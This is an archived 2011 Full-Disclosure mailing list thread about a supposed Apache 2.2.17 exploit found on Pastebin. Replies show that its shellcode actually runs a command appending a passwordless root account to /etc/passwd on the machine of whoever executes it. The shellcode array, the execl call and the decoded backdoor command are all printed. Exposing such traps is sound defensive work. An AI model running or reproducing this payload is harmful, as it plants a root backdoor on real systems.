lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <CALCvwp65v8EcBTW8NXdW7xnzdS_VBpm5UE_RFyJ9gupFDj4i_w@mail.gmail.com>
Date: Wed, 5 Oct 2011 13:21:17 +1100
From: xD 0x41 <secn3t@...il.com>
To: VeNoMouS <venom@...-x.co.nz>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Apache 2.2.17 exploit?

yer it is clarly leet stuff dude...
i ran it and got liek 2000000000000000k2.2.* apache user bot  in a night! :P
hgehe (jkin)
funny tho.
xd


On 5 October 2011 13:09, VeNoMouS <venom@...-x.co.nz> wrote:

> **
> char evil[] =
>                 "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47
> \x89"
>                 "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51
> \x89"
>                 "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80
> \xe8"
>                 "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63
> \x23"
>                 "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30
> \x74"
>                 "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65
> \x3a"
>                 "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73
> \x68"
>                 "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77
> \x64"
>                 "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44
> \x44"
>                 "\x44\x44"
> .....
> execl("/bin/sh", "sh", "-c", evil, 0);
>
> .....
>
>
>
> /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd
>
> AHUH.....
>
>
>
> On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote:
>
> I regularly trawl Pastebin.com to find code - often idiots leave some 0day
> and similar there and it is nice to find.
>
> Well, seeing as I have no test boxes at the moment, can someone check this
> code in a VM? I am not sure if it is legit or not.
>
> http://pastebin.com/ygByEV2e
>
> Thanks :)
>
> ~Darren
>
>
>
>    1. char evil[] =
>     2.                 "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88
>    \x46\x47\x89"
>     3.                 "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89
>    \x5e\x51\x89"
>     4.                 "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55
>    \xcd\x80\xe8"
>     5.                 "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23
>    \x2d\x63\x23"
>     6.                 "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30
>    \x30\x30\x74"
>     7.                 "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30
>    \x64\x65\x3a"
>     8.                 "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62
>    \x61\x73\x68"
>     9.                 "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73
>    \x73\x77\x64"
>     10.                 "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43
>    \x43\x44\x44"
>     11.                 "\x44\x44";
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ